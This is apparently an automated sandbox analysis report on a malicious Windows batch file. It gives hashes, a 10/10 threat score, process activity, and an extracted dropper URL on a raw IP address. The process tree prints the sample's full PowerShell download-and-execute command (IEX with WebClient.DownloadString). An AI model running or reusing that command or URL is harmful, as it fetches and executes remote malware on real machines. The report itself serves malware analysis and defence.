Analysis
-
max time kernel
64s -
max time network
96s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
12-07-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
6ebe9b72866bb759c8fb8b43c6691c55.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
6ebe9b72866bb759c8fb8b43c6691c55.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
6ebe9b72866bb759c8fb8b43c6691c55.bat
-
Size
217B
-
MD5
9a910f1611f357e048f8f5ca83a09740
-
SHA1
ca3e718abf686be0e827824a117c276ebab717d9
-
SHA256
8178b2a273ccd3ec4e01c78beeabb8b306e6851906b9581eff43d3af65cb72cb
-
SHA512
279acdb19eefff654a3828abdb8e37ac8d0a937ba8908e8465f2daefb88cfade810fc0ff18c2dd43288583a5b48a634cd4813fb087a837e2331190bd3470cb01
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/6ebe9b72866bb759c8fb8b43c6691c55
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1008 wrote to memory of 4028 1008 cmd.exe 67 PID 1008 wrote to memory of 4028 1008 cmd.exe 67 PID 1008 wrote to memory of 4028 1008 cmd.exe 67 -
Program crash 1 IoCs
pid pid_target Process procid_target 808 4028 WerFault.exe 67 -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeRestorePrivilege 808 WerFault.exe Token: SeBackupPrivilege 808 WerFault.exe Token: SeDebugPrivilege 808 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe 808 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6ebe9b72866bb759c8fb8b43c6691c55.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/6ebe9b72866bb759c8fb8b43c6691c55');Invoke-RDYJJFERDU;Start-Sleep -s 10000"2⤵PID:4028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:808
-
-